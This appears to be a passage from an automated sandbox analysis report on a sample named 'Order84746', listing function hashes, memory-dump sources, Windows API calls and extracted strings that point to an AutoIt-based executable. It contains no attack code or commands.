                          • Opcode ID: f075384f87ffa9ce4270e8d5610226c6fa87225994024a9d20e4b73cbda28f55
                          • Instruction ID: 7c93c36f0c777d09e7d34f01557b55c2564a7477013acc6a8ffd64aa74a7d481
                          • Opcode Fuzzy Hash: f075384f87ffa9ce4270e8d5610226c6fa87225994024a9d20e4b73cbda28f55
                          • Instruction Fuzzy Hash: D5C04CB1805109DFC751CBC0CD449EEB7BCAB04301F104195D155F1110D7749B459B76
                          APIs
                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0090818F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ExceptionFilterUnhandled
                          • String ID:
                          • API String ID: 3192549508-0
                          • Opcode ID: 798c290410cdfa03db2dc269274787da070ce83066e60f5d9112c20514e6beb7
                          • Instruction ID: 5efe0c24d557c93fd2e6857d7e921e9911135ac04d097379e134ea58d08b5c00
                          • Opcode Fuzzy Hash: 798c290410cdfa03db2dc269274787da070ce83066e60f5d9112c20514e6beb7
                          • Instruction Fuzzy Hash: FDA0223000A20CFBCF002F83FC08C883F2CFB002A8B000020F80C00230CBB3AA20AAC2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: BuffCharUpper
                          • String ID:
                          • API String ID: 3964851224-0
                          • Opcode ID: 614f1d6674a1d78fd91440536fe45cd82ca28a36c6cc2d3fa992a8bc4ffdee06
                          • Instruction ID: f4e24bed23a338b93ccb0c5ef38025e7e3e696cd5954d114f671e3ed83e1d52f
                          • Opcode Fuzzy Hash: 614f1d6674a1d78fd91440536fe45cd82ca28a36c6cc2d3fa992a8bc4ffdee06
                          • Instruction Fuzzy Hash: 20927870608345DFD724DF29C490B2AB7E5FF89308F14885DEA8A8B262D771E949CB52
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: dce635e505acb315416effb450bc43373d17d8d41f2b30def70d8b8e936627af
                          • Instruction ID: 21e0095d0638f0ceb8da39f79f65eb03be1fdf0cd482f26e7919436c34a50373
                          • Opcode Fuzzy Hash: dce635e505acb315416effb450bc43373d17d8d41f2b30def70d8b8e936627af
                          • Instruction Fuzzy Hash: B522AE70904259CFDB24DF59D480ABEB7B0FF1A308F148069E99ADB391E731AD85CB91
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4f3c4a97bc9726f8e7cb1edf23d23fdc7bc68e17a1ed0124f54ecde19b79f8ab
                          • Instruction ID: f1deec57663e4baf04247d596045b789db26dc5726aa421bcbb1b250fdb52d85
                          • Opcode Fuzzy Hash: 4f3c4a97bc9726f8e7cb1edf23d23fdc7bc68e17a1ed0124f54ecde19b79f8ab
                          • Instruction Fuzzy Hash: 5A129C70A00209EFDF04DFAAD981AAEB7F5FF49300F204529E846E7290EB35A914CB55
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Exception@8Throwstd::exception::exception
                          • String ID:
                          • API String ID: 3728558374-0
                          • Opcode ID: 7ad1e7f75ca4b68988ab5b0ec8bbd32c8dcdd6893f8c70e24b079319ff66de5d
                          • Instruction ID: 79383f1a31b346284cbf12b2b10c31caafc979399d42dc870d577aeb74cd15b0
                          • Opcode Fuzzy Hash: 7ad1e7f75ca4b68988ab5b0ec8bbd32c8dcdd6893f8c70e24b079319ff66de5d
                          • Instruction Fuzzy Hash: 1A02C370E00209DFCF04DF69D991AAEB7B5FF46300F148469E806EB295EB35DA15CB92
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                          • Instruction ID: 11388cffb46f77f975125eecd5227a10bb93df85fc9ba8eb3b0315ff2e2b51ba
                          • Opcode Fuzzy Hash: 6bcf19402166b509fafb4c50a64371ef2a93877f8d810bfc08732e8a9195a1a8
                          • Instruction Fuzzy Hash: 2FC1B1322051970EDF2D463A843453EBAA5AEE2BB171A076DD9B2CF4D6FF20D534D620
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                          • Instruction ID: 384b472328176e7e047b1511d06266fcbf13e7b57e66ba72229c93f551bef87a
                          • Opcode Fuzzy Hash: 2d76c3bdd49f8e00aad6e71f29a941d673537f809e9b181fbd8d4251c6dfdf40
                          • Instruction Fuzzy Hash: 32C19F322051970EDF2D463A843463EBAA5AEE2BB171A076DD5B2CF4D6FF20D534D620
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                          • Instruction ID: cb5dfa97ec00b096acc7491fb9aeb5a61829dded933b19a1624c42018ead4a8e
                          • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                          • Instruction Fuzzy Hash: 4DC170322050AB09DB2D4639847443EBAA1AEA2BB531A077DD6B2CF5D6FF20D574D620
                          Memory Dump Source
                          • Source File: 00000000.00000002.1678053935.00000000011D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 011D8000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_11d8000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                          • Instruction ID: b9aff9c2ad857e8e90dc07e6341634539f6d7bde57297b0f521348d6892db110
                          • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                          • Instruction Fuzzy Hash: E841D271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB80
                          Memory Dump Source
                          • Source File: 00000000.00000002.1678053935.00000000011D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 011D8000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_11d8000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                          • Instruction ID: f9ae532a91f660cc5bd0d05262f5c8f18a07274f7c3e7a188c1915ac3f5eaca1
                          • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                          • Instruction Fuzzy Hash: 10019278A00109EFCB48DFA8C5909AEF7F6FF48310F208599D819A7341D730AE41DB80
                          Memory Dump Source
                          • Source File: 00000000.00000002.1678053935.00000000011D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 011D8000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_11d8000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                          • Instruction ID: e60e88af943c37f88622f19d13b57a45d9d5fa8b1f32938dbc4e614354aff3ac
                          • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                          • Instruction Fuzzy Hash: 1A019278A00109EFCB48DFA8C5909AEF7F6FF48310F208599D809A7341D730AE41DB80
                          Memory Dump Source
                          • Source File: 00000000.00000002.1678053935.00000000011D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 011D8000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_11d8000_Order84746.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                          • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                          • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                          • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                          APIs
                          • DeleteObject.GDI32(00000000), ref: 0093A2FE
                          • DeleteObject.GDI32(00000000), ref: 0093A310
                          • DestroyWindow.USER32 ref: 0093A31E
                          • GetDesktopWindow.USER32 ref: 0093A338
                          • GetWindowRect.USER32(00000000), ref: 0093A33F
                          • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0093A480
                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 0093A490
                          • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0093A4D8
                          • GetClientRect.USER32(00000000,?), ref: 0093A4E4
                          • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0093A51E
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0093A540
                          • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0093A553
                          • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0093A55E
                          • GlobalLock.KERNEL32(00000000), ref: 0093A567
                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0093A576
                          • GlobalUnlock.KERNEL32(00000000), ref: 0093A57F
                          • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0093A586
                          • GlobalFree.KERNEL32(00000000), ref: 0093A591
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,88C00000), ref: 0093A5A3
                          • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0096D9BC,00000000), ref: 0093A5B9
                          • GlobalFree.KERNEL32(00000000), ref: 0093A5C9
                          • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 0093A5EF
                          • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 0093A60E
                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0093A630
                          • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0093A81D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                          • String ID: $AutoIt v3$DISPLAY$static
                          • API String ID: 2211948467-2373415609
                          • Opcode ID: c0cce6ab20819399bd50ca8e044f38f63587c5dfac6eca348da08091b90bdf06
                          • Instruction ID: cbdb3cd641efd87746624d45589c36e4a274ad27a5c72a22e66b7786a43dba9f
                          • Opcode Fuzzy Hash: c0cce6ab20819399bd50ca8e044f38f63587c5dfac6eca348da08091b90bdf06
                          • Instruction Fuzzy Hash: 48027B75A10214AFDB14DFA9DD89EAE7BB9FF49310F008118F915AB2A0C7B0AD41DF61
                          APIs
                          • SetTextColor.GDI32(?,00000000), ref: 0094D2DB
                          • GetSysColorBrush.USER32(0000000F), ref: 0094D30C
                          • GetSysColor.USER32(0000000F), ref: 0094D318
                          • SetBkColor.GDI32(?,000000FF), ref: 0094D332
                          • SelectObject.GDI32(?,00000000), ref: 0094D341
                          • InflateRect.USER32(?,000000FF,000000FF), ref: 0094D36C
                          • GetSysColor.USER32(00000010), ref: 0094D374
                          • CreateSolidBrush.GDI32(00000000), ref: 0094D37B
                          • FrameRect.USER32(?,?,00000000), ref: 0094D38A
                          • DeleteObject.GDI32(00000000), ref: 0094D391
                          • InflateRect.USER32(?,000000FE,000000FE), ref: 0094D3DC
                          • FillRect.USER32(?,?,00000000), ref: 0094D40E
                          • GetWindowLongW.USER32(?,000000F0), ref: 0094D439
                            • Part of subcall function 0094D575: GetSysColor.USER32(00000012), ref: 0094D5AE
                            • Part of subcall function 0094D575: SetTextColor.GDI32(?,?), ref: 0094D5B2
                            • Part of subcall function 0094D575: GetSysColorBrush.USER32(0000000F), ref: 0094D5C8
                            • Part of subcall function 0094D575: GetSysColor.USER32(0000000F), ref: 0094D5D3
                            • Part of subcall function 0094D575: GetSysColor.USER32(00000011), ref: 0094D5F0
                            • Part of subcall function 0094D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0094D5FE
                            • Part of subcall function 0094D575: SelectObject.GDI32(?,00000000), ref: 0094D60F
                            • Part of subcall function 0094D575: SetBkColor.GDI32(?,00000000), ref: 0094D618
                            • Part of subcall function 0094D575: SelectObject.GDI32(?,?), ref: 0094D625
                            • Part of subcall function 0094D575: InflateRect.USER32(?,000000FF,000000FF), ref: 0094D644
                            • Part of subcall function 0094D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0094D65B
                            • Part of subcall function 0094D575: GetWindowLongW.USER32(00000000,000000F0), ref: 0094D670
                            • Part of subcall function 0094D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0094D698
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                          • String ID:
                          • API String ID: 3521893082-0
                          • Opcode ID: bc07a69010424a37a51f6876e7a9a3cac37337b3a442d475b6fffbf6086ea223
                          • Instruction ID: a2774c0df2af030f3ca28bd1a4345d42ebe7c66599a6d082ec3266f26dddc541
                          • Opcode Fuzzy Hash: bc07a69010424a37a51f6876e7a9a3cac37337b3a442d475b6fffbf6086ea223
                          • Instruction Fuzzy Hash: 85918D7190E301AFC7109F64DC08E6B7BA9FF8A325F100A1DF962961E0C7B1D944DB92
                          APIs
                          • SetErrorMode.KERNEL32(00000001), ref: 0092DBD6
                          • GetDriveTypeW.KERNEL32(?,0097DC54,?,\\.\,0097DC00), ref: 0092DCC3
                          • SetErrorMode.KERNEL32(00000000,0097DC54,?,\\.\,0097DC00), ref: 0092DE29
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: ErrorMode$DriveType
                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                          • API String ID: 2907320926-4222207086
                          • Opcode ID: 71e917b936ad03e3ebdaf554e4ce75237441788d2fbf95d3a7925ac6944713de
                          • Instruction ID: 6a9e1111e998c9cfa3d1e02a8644f6ab670a6e1f2b4dd03bf592d5991c8ace33
                          • Opcode Fuzzy Hash: 71e917b936ad03e3ebdaf554e4ce75237441788d2fbf95d3a7925ac6944713de
                          • Instruction Fuzzy Hash: 0951C23020EB62AF8B10DF18E882939B7A4FBD5709B208C19F457DB6E9DB60D945D742
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: __wcsnicmp
                          • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                          • API String ID: 1038674560-86951937
                          • Opcode ID: 5c4063bc9bae65d50d80fddbbebcefa08f61e00178a5c79d3576e6dd74eea4f3
                          • Instruction ID: a21e11ffd01f55f8f5f9d07afd87c69fc30c8c52bb5ceec8a0d714eb152c6a6f
                          • Opcode Fuzzy Hash: 5c4063bc9bae65d50d80fddbbebcefa08f61e00178a5c79d3576e6dd74eea4f3
                          • Instruction Fuzzy Hash: 9081FA31A40259BBCB24AB6ADC43FBA3778FF56305F048024FD09E61C2EB61DA46C391
                          APIs
                          • DestroyWindow.USER32 ref: 008FB98B
                          • DeleteObject.GDI32(00000000), ref: 008FB9CD
                          • DeleteObject.GDI32(00000000), ref: 008FB9D8
                          • DestroyCursor.USER32(00000000), ref: 008FB9E3
                          • DestroyWindow.USER32(00000000), ref: 008FB9EE
                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0095D2AA
                          • 72BB0200.COMCTL32(?,000000FF,?), ref: 0095D2E3
                          • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 0095D711
                            • Part of subcall function 008FB9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,008FB759,?,00000000,?,?,?,?,008FB72B,00000000,?), ref: 008FBA58
                          • SendMessageW.USER32 ref: 0095D758
                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0095D76F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                          • Associated: 00000000.00000002.1677354075.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000098E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.000000000099A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677370911.00000000009DF000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677525100.00000000009E5000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1677548491.00000000009E7000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_8e0000_Order84746.jbxd
                          Similarity
                          • API ID: DestroyMessageSendWindow$DeleteObject$B0200CursorInvalidateMoveRect
                          • String ID: 0
                          • API String ID: 3010530511-4108050209
                          • Opcode ID: 3115f3d0497804006ad0e35f096b8d92e6de40072a5bffa749fad042c1102c1f
                          • Instruction ID: cb378262d689c0e1da604c0679387b708fbee4166eaa8f56cd1530fa64991c87
                          • Opcode Fuzzy Hash: 3115f3d0497804006ad0e35f096b8d92e6de40072a5bffa749fad042c1102c1f
                          • Instruction Fuzzy Hash: A312C030606205DFDB20CF29C884BA9BBE4FF45306F144569FA99CB262D771EC4ADB91
                          APIs
                          • CharUpperBuffW.USER32(?,?,0097DC00), ref: 00946449
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1677370911.00000000008E1000.00000040.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
